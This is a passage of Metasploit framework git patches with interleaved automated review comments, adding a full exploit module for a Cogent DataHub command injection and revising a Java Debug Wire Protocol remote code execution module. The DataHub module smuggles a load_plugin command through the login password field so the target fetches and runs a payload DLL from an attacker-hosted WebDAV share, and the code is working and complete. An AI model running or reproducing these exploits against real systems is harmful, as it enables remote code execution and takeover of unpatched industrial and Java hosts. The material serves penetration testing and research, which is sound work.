+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb @@ -12,10 +12,10 @@ module Stdapi # ## -TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600 +TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600 TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 -TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630 -TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631 +TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630 +TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631 TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632 ## @@ -100,7 +100,7 @@ PROCESS_EXECUTE_FLAG_DESKTOP = (1 << 4) PROCESS_EXECUTE_FLAG_SESSION = (1 << 5) # Registry -TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000 +TLV_TYPE_HKEY = TLV_META_TYPE_QWORD | 1000 TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001 TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002 @@ -147,7 +147,7 @@ TLV_TYPE_PROCESS_SESSION = TLV_META_TYPE_UINT | 2308 TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400 TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401 TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402 -TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403 +TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_QWORD | 2403 TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404 TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405 TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406 @@ -155,8 +155,8 @@ TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406 TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500 TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502 TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510 -TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511 -TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512 +TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_QWORD | 2511 +TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_QWORD | 2512 TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513 TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540 
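Review bot: In the hunk at -147,7 `TLV_TYPE_PROCEDURE_ADDRESS` becomes a QWORD while the neighbouring `TLV_TYPE_IMAGE_BASE` stays `TLV_META_TYPE_UINT | 2404`. An image base looks like the same kind of pointer-sized value the commit message is about, so it would presumably truncate in the same way. If it was left out on purpose, a short comment beside it should say why; otherwise `TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_QWORD | 2404`. Because the meta type is OR-ed into each constant, every change here also alters the numeric TLV id, so the code on the other end of the channel has to change in step.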
@@ -189,7 +189,7 @@ TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLV_META_TYPE_STRING | 3012 # ## TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000 -TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001 +TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_QWORD | 4001 TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002 TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003 From 079fe8622a54a7c91b53e9dbc5668e9777565908 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 10:29:33 -0500 Subject: [PATCH 482/853] Add module for ZDI-14-136 --- .../windows/http/cogent_datahub_command.rb | 434 ++++++++++++++++++ 1 file changed, 434 insertions(+) create mode 100644 modules/exploits/windows/http/cogent_datahub_command.rb diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb new file mode 100644 index 0000000000..3d3f8db0cd --- /dev/null +++ b/modules/exploits/windows/http/cogent_datahub_command.rb 
@@ -0,0 +1,434 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + # Exploitation is reliable, but the service hangs and needs manual restarting. + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize + super( + 'Name' => 'Cogent DataHub Command Injection', + 'Description' => %q{ + This module exploits an injection vulnerability in Cogent DataHub prior to 7.3.5. The + vulnerability exists in the GetPermissions.asp page, which makes an insecure usage of + the datahub_command function with user controlled data, allowing execution of arbitrary + datahub commands. This module has been tested successfully with Cogent DataHub 7.3.1 on + Windows 7 SP1. + }, + 'Author' => [ + 'John Leitch', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'Platform' => 'win', + 'References' => + [ + ['ZDI', '14-136'], + ['CVE', '2014-3789'], + ['BID', '67486'] + ], + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DefaultOptions' => { + 'WfsDelay' => 30, + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Targets' => + [ + [ 'Cogent DataHub < 7.3.5', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 29 2014' + ) + register_options( + [ + OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]), + OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]), + OptInt.new('WEBDAV_DELAY', [ true, 'Time that the HTTP Server will wait for the payload request', 20]), + OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' 
]) + ], self.class) + end + + def autofilter + false + end + + def on_request_uri(cli, request) + case request.method + when 'OPTIONS' + process_options(cli, request) + when 'PROPFIND' + process_propfind(cli, request) + when 'GET' + process_get(cli, request) + else + vprint_status("#{request.method} => 404 (#{request.uri})") + resp = create_response(404, "Not Found") + resp.body = "" + resp['Content-Type'] = 'text/html' + cli.send_response(resp) + end + end + + def process_get(cli, request) + + if blacklisted_path?(request.uri) + vprint_status("GET => 404 [BLACKLIST] (#{request.uri})") + resp = create_response(404, "Not Found") + resp.body = "" + cli.send_response(resp) + return + end + + if request.uri.include?(@basename) + print_status("GET => Payload") + return if ((p = regenerate_payload(cli)) == nil) + data = generate_payload_dll({ :code => p.encoded }) + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + return + end + + # Treat index.html specially + if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i) + vprint_status("GET => REDIRECT (#{request.uri})") + resp = create_response(200, "OK") + + resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=#{@exploit_unc}#{@share_name}\\"></head><body></body></html>| + + resp['Content-Type'] = 'text/html' + cli.send_response(resp) + return + end + + # Anything else is probably a request for a data file... 
+ vprint_status("GET => DATA (#{request.uri})") + data = rand_text_alpha(4 + rand(4)) + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + # + # OPTIONS requests sent by the WebDav Mini-Redirector + # + def process_options(cli, request) + vprint_status("OPTIONS #{request.uri}") + headers = { + 'MS-Author-Via' => 'DAV', + 'DASL' => '<DAV:sql>', + 'DAV' => '1, 2', + 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH', + 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK', + 'Cache-Control' => 'private' + } + resp = create_response(207, "Multi-Status") + headers.each_pair {|k,v| resp[k] = v } + resp.body = "" + resp['Content-Type'] = 'text/xml' + cli.send_response(resp) + end + + # + # PROPFIND requests sent by the WebDav Mini-Redirector + # + def process_propfind(cli, request) + path = request.uri + vprint_status("PROPFIND #{path}") + + if path !~ /\/$/ + + if blacklisted_path?(path) + vprint_status "PROPFIND => 404 (#{path})" + resp = create_response(404, "Not Found") + resp.body = "" + cli.send_response(resp) + return + end + + if path.index(".") + vprint_status "PROPFIND => 207 File (#{path})" + body = %Q|<?xml version="1.0" encoding="utf-8"?> +<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/"> +<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> +<D:href>#{path}</D:href> +<D:propstat> +<D:prop> +<lp1:resourcetype/> +<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> +<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> +<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> +<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> +<lp2:executable>T</lp2:executable> +<D:supportedlock> +<D:lockentry> +<D:lockscope><D:exclusive/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +<D:lockentry> +<D:lockscope><D:shared/></D:lockscope> 
+<D:locktype><D:write/></D:locktype> +</D:lockentry> +</D:supportedlock> +<D:lockdiscovery/> +<D:getcontenttype>application/octet-stream</D:getcontenttype> +</D:prop> +<D:status>HTTP/1.1 200 OK</D:status> +</D:propstat> +</D:response> +</D:multistatus> +| + # send the response + resp = create_response(207, "Multi-Status") + resp.body = body + resp['Content-Type'] = 'text/xml; charset="utf8"' + cli.send_response(resp) + return + else + vprint_status "PROPFIND => 301 (#{path})" + resp = create_response(301, "Moved") + resp["Location"] = path + "/" + resp['Content-Type'] = 'text/html' + cli.send_response(resp) + return + end + end + + vprint_status "PROPFIND => 207 Directory (#{path})" + body = %Q|<?xml version="1.0" encoding="utf-8"?> +<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/"> + <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> + <D:href>#{path}</D:href> + <D:propstat> + <D:prop> + <lp1:resourcetype><D:collection/></lp1:resourcetype> + <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> + <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> + <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> + <D:supportedlock> + <D:lockentry> + <D:lockscope><D:exclusive/></D:lockscope> + <D:locktype><D:write/></D:locktype> + </D:lockentry> + <D:lockentry> + <D:lockscope><D:shared/></D:lockscope> + <D:locktype><D:write/></D:locktype> + </D:lockentry> + </D:supportedlock> + <D:lockdiscovery/> + <D:getcontenttype>httpd/unix-directory</D:getcontenttype> + </D:prop> + <D:status>HTTP/1.1 200 OK</D:status> + </D:propstat> +</D:response> +| + + if request["Depth"].to_i > 0 + trail = path.split("/") + trail.shift + case trail.length + when 0 + body << generate_shares(path) + when 1 + body << generate_files(path) + end + else + vprint_status "PROPFIND => 207 Top-Level Directory" + end + + body << "</D:multistatus>" + + body.gsub!(/\t/, '') + + # send the response + resp = create_response(207, "Multi-Status") 
+ resp.body = body + resp['Content-Type'] = 'text/xml; charset="utf8"' + cli.send_response(resp) + end + + def generate_shares(path) + share_name = @share_name + %Q| +<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> +<D:href>#{path}#{share_name}/</D:href> +<D:propstat> +<D:prop> +<lp1:resourcetype><D:collection/></lp1:resourcetype> +<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> +<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> +<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> +<D:supportedlock> +<D:lockentry> +<D:lockscope><D:exclusive/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +<D:lockentry> +<D:lockscope><D:shared/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +</D:supportedlock> +<D:lockdiscovery/> +<D:getcontenttype>httpd/unix-directory</D:getcontenttype> +</D:prop> +<D:status>HTTP/1.1 200 OK</D:status> +</D:propstat> +</D:response> +| + end + + def generate_files(path) + trail = path.split("/") + return "" if trail.length < 2 + + base = @basename + exts = @extensions.gsub(",", " ").split(/\s+/) + files = "" + exts.each do |ext| + files << %Q| +<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> +<D:href>#{path}#{base}.#{ext}</D:href> +<D:propstat> +<D:prop> +<lp1:resourcetype/> +<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> +<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength> +<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> +<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> +<lp2:executable>T</lp2:executable> +<D:supportedlock> +<D:lockentry> +<D:lockscope><D:exclusive/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +<D:lockentry> +<D:lockscope><D:shared/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +</D:supportedlock> +<D:lockdiscovery/> +<D:getcontenttype>application/octet-stream</D:getcontenttype> +</D:prop> +<D:status>HTTP/1.1 200 OK</D:status> 
+<D:ishidden b:dt="boolean">1</D:ishidden> +</D:propstat> +</D:response> +| + end + + files + end + + def gen_timestamp(ttype=nil) + ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT") + end + + def gen_datestamp(ttype=nil) + ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ") + end + + # This method rejects requests that are known to break exploitation + def blacklisted_path?(uri) + share_path = "/#{@share_name}" + payload_path = "#{share_path}/#{@basename}.dll" + case uri + when payload_path + return false + when share_path + return false + else + return true + end + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'), + 'vars_post' => + { + 'username' => rand_text_alpha(4 + rand(4)), + 'password' => rand_text_alpha(4 + rand(4)) + } + }) + + if res && res.code == 200 && res.body =~ /PermissionRecord/ + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def send_injection(dll) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'), + 'vars_post' => + { + 'username' => rand_text_alpha(3 + rand(3)), + 'password' => "#{rand_text_alpha(3 + rand(3))}\")(load_plugin \"#{dll}\" 1)(\"" + } + }, 1) + + res + end + + def on_new_session(session) + if service + service.stop + end + + super + end + + def primer + print_status("#{peer} - Sending injection...") + res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll") + if res + print_error("#{peer} - Unexpected answer") + end + end + + def exploit + if datastore['UNCPATH'].blank? + @basename = rand_text_alpha(3) + @share_name = rand_text_alpha(3) + @extensions = "dll" + @system_commands_file = rand_text_alpha_lower(4) + + @myhost = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] + + @exploit_unc = "\\\\#{@myhost}\\" + + if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' + fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') + end + + print_status("Starting Shared resource at #{@exploit_unc}#{@share_name}\\#{@basename}.dll") + + begin + Timeout.timeout(datastore['WEBDAV_DELAY']) { super } # The Windows Webclient needs some time... + rescue ::Timeout::Error + service.stop if service + end + else + # Using external SMB Server + if datastore['UNCPATH'] =~ /\\\\([^\\]*)\\([^\\]*)\\([^\\]*\.dll)/ + host = $1 + share_name = $2 + dll_name = $3 + print_status("#{peer} - Sending injection...") + res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}") + if res + print_error("#{peer} - Unexpected answer") + end + else + fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll') + end + end + end + +end From 9ffe8d80b427171c61d0c877db3968559d7e56a5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:33:57 -0500 Subject: [PATCH 483/853] Do some metadata cleaning --- .../exploits/multi/misc/java_jdwp_debugger.rb | 73 ++++++++++--------- 1 file changed, 39 insertions(+), 34 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 959a0d7a65..a7b5999f17 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -6,13 +6,12 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::FileDropper - HANDSHAKE = "JDWP-Handshake" REQUEST_PACKET_TYPE = 0x00 
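Review bot: `gen_timestamp` and `gen_datestamp` format `::Time.now` and then append a literal `GMT` or `Z`, so on a host whose zone is not UTC the generated WebDAV properties carry local time labelled as UTC. Using `::Time.now.utc.strftime(...)` in both would make the label true. Both methods also declare a `ttype=nil` parameter that the bodies never read and that no call in this file passes. Separately, the info hash has no `'License' => MSF_LICENSE` entry, `@system_commands_file` is assigned in `exploit` but not read anywhere in this file, and the header comment URL `http//metasploit.com/download` is missing its colon.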
@@ -65,43 +64,50 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( - 'Name' => 'Java Debugging Wire Protocol Scanner', + 'Name' => 'Java Debug Wire Protocol Remote Code Execution', 'Description' => %q{ - This module abuses exposed Java Debugging Wire Protocol services in order - to execute code remotely. + This module abuses exposed Java Debug Wire Protocol services in order + to execute arbitrary Java code remotely. It just uses the protocol + features, since no authentication is required if the service is enabled. }, 'Author' => [ - 'Christophe Alladoum', # Exploit + 'prdelka', # Vulnerability discovery + 'Christophe Alladoum', # JDWP Analysis and Exploit 'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module ], 'References' => [ - ['http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'], - ['http://www.exploit-db.com/papers/27179/'], - ['https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], - ['http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] + ['OSVDB', '96066'], + ['EDB', '27179'], + ['URL', 'http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'], + ['URL', 'http://www.exploit-db.com/papers/27179/'], + ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], + ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] ], - 'DisclosureDate' => 'May 29 2014', - 'License' => MSF_LICENSE, 'Platform' => %w{ linux win }, - 'Privileged' => true, - 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => + 'Arch' => ARCH_X86, + 'Payload' => + { + 'Space' => 2048, + 'BadChars' => '', + 'DisableNops' => true + }, + 'Targets' => [ - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win', - 'Arch' => ARCH_X86, - } - ], [ 'Linux x86 (Native Payload)', { - 'Platform' => 'linux', - 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win' } ] ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0, 
+ 'License' => MSF_LICENSE, + 'DisclosureDate' => 'May 29 2014' ) register_options( @@ -109,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote Opt::RPORT(8000), OptInt.new('STATUS_EVERY', [true, 'How many iterations until status', 1000]), OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), - OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Ensure there is a trailing slash', nil]) + OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']), + OptString.new('BREAKPOINT', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), + OptPort.new('BREAKPOINT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection' ]) ], self.class) register_advanced_options( [ - OptString.new('BREAK_CLASS', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), - OptInt.new('BREAK_AUTOHIT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection', nil ]), OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) ], self.class) @@ -151,7 +157,6 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(HANDSHAKE) return sock.get(datastore['RESPONSE_TIMEOUT']) - end # Forges packet for JDWP protocol 
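Review bot: The new `['EDB', '27179']` reference in the -65,43 hunk may point at the wrong item, because the URL kept next to it is `http://www.exploit-db.com/papers/27179/`, a paper. As far as I know an `EDB` reference is resolved as an exploit id, so if 27179 exists only as a paper the `URL` entry alone is the accurate one. If both exist, a trailing comment on each line saying which is the paper and which is the exploit would explain the apparent duplicate. The same hunk adds `'Space' => 2048` and drops `'Privileged' => true` with no stated reason; a short comment on the `Space` line, or a sentence in the commit message, would record where those decisions come from.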
@@ -507,7 +512,7 @@ class Metasploit3 < Msf::Exploit::Remote # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event - force_net_event unless datastore['BREAK_AUTOHIT_PORT'].nil? || (datastore['BREAK_AUTOHIT_PORT'] == 0) + force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) buf = read_reply(datastore['BREAK_TIMEOUT']) @@ -518,11 +523,11 @@ class Metasploit3 < Msf::Exploit::Remote # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket def force_net_event - vprint_status("#{peer} - Forcing network event over #{datastore['BREAK_AUTOHIT_PORT']}") + print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, - 'PeerPort' => datastore['BREAK_AUTOHIT_PORT'], + 'PeerPort' => datastore['BREAKPOINT_PORT'], ) rex_socket.put(rand_text_alphanumeric(4 + rand(4))) @@ -845,14 +850,14 @@ class Metasploit3 < Msf::Exploit::Remote # Sets a breakpoint on frequently called method (user-defined) def set_breakpoint - vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAK_CLASS']}") + vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAKPOINT']}") # 1. Gets reference of the method where breakpoint is going to be setted - classname, method = str2fqclass(datastore['BREAK_CLASS']) + classname, method = str2fqclass(datastore['BREAKPOINT']) break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, probably is not used by the application") unless break_class + fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") unless break_class get_methods(break_class["reftype_id"]) From 3869fcb43834fadb5737642968092f7087939e8f Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:41:23 -0500 Subject: [PATCH 484/853] common http breakpoint event --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index a7b5999f17..d19d28bac0 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -525,15 +525,19 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") + print_status("#{rhost}") + print_status("#{datastore['BREAKPOINT_PORT']}") + rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, 'PeerPort' => datastore['BREAKPOINT_PORT'], ) - rex_socket.put(rand_text_alphanumeric(4 + rand(4))) + rex_socket.put("GET / HTTP/1.0\r\n\r\n") rex_socket.shutdown - + rex_socket.close + print_status("BYE force_net_event") end From 7a5b5d31f9054c7a27b107b439ccbe9ac30366e9 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:43:39 -0500 Subject: [PATCH 485/853] Avoid messages inside check --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index d19d28bac0..4c59ef5666 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
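Review bot: The three added calls `print_status("#{rhost}")`, `print_status("#{datastore['BREAKPOINT_PORT']}")` and `print_status("BYE force_net_event")` read as leftover debugging output. The host and port already appear in the `Forcing network event` message directly above them, so they can be removed or demoted to `vprint_status`. The added `rex_socket.close` is only reached when `put` and `shutdown` return normally; moving it into an `ensure` clause would release the socket on the error path as well. The method's `def` line is above this hunk.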
@@ -129,22 +129,16 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - - vprint_status("#{peer} - Checking for Java Debugging Wire Protocol") - res = handshake - disconnect - unless res - vprint_error("Unable to determine due to a connection timeout") + if res.nil? return Exploit::CheckCode::Unknown + elsif res == HANDSHAKE + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Appears if res == HANDSHAKE - - return Exploit::CheckCode::Safe - + Exploit::CheckCode::Safe end From 1ff539fc73bad6cc93fedc1485c565438ae9df22 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:48:20 -0500 Subject: [PATCH 486/853] No sense to check two times --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 4c59ef5666..cd62066304 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -921,15 +921,11 @@ class Metasploit3 < Msf::Exploit::Remote @methods = {} @os = nil - - fail_with(Failure::NotVulnerable, "#{peer} - Doesn't seem to be vulnerable") if check == Exploit::CheckCode::Safe - - # To avoid connection refused due to previously opened connection during check - Rex::sleep(1) - connect - fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake == HANDSHAKE + unless handshake == HANDSHAKE + fail_with(Failure::NotVulnerable, "#{peer} - JDWP Protocol not found") + end # 1. Get the sizes of variably-sized data types in the target VM idsizes From 33a7bc64fa5df197a9632d1ad1cfded2a8c3e069 Mon Sep 17 00:00:00 2001 
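Review bot: In the rewritten `check` (-129,22 hunk), `disconnect` runs only when `connect` and `handshake` both return normally, and a refused or timed-out connection would leave `check` by exception instead of returning a check code. Wrapping the two calls so that a connection error maps to `Exploit::CheckCode::Unknown`, with `disconnect` in an `ensure`, keeps the existing nil / `HANDSHAKE` / other mapping unchanged. Whether `connect` already rescues internally is not visible in this hunk, so the rescue clause may turn out to be redundant.

```ruby
  def check
    begin
      connect
      res = handshake
    rescue Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    ensure
      disconnect
    end
    # … unchanged: mapping of res to Unknown / Appears / Safe …
  end
```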
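Review bot: In the -921,15 hunk, `exploit` now reports every handshake mismatch as `Failure::NotVulnerable`, including the case where `handshake` returns nil because nothing answered within `RESPONSE_TIMEOUT`. The `check` method changed in the previous patch maps that same nil to `CheckCode::Unknown`, so the two paths disagree about what silence means. Keeping the result in a local and adding `fail_with(Failure::TimeoutExpired, "#{peer} - No reply to the JDWP handshake") if res.nil?` before the existing `unless res == HANDSHAKE` test would make them consistent. The `exploit` method starts and ends outside this hunk.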
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 13:18:59 -0500 Subject: [PATCH 487/853] Do some easy cleaning --- .../exploits/multi/misc/java_jdwp_debugger.rb | 248 ++++-------------- 1 file changed, 49 insertions(+), 199 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index cd62066304..0b29ebe67c 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
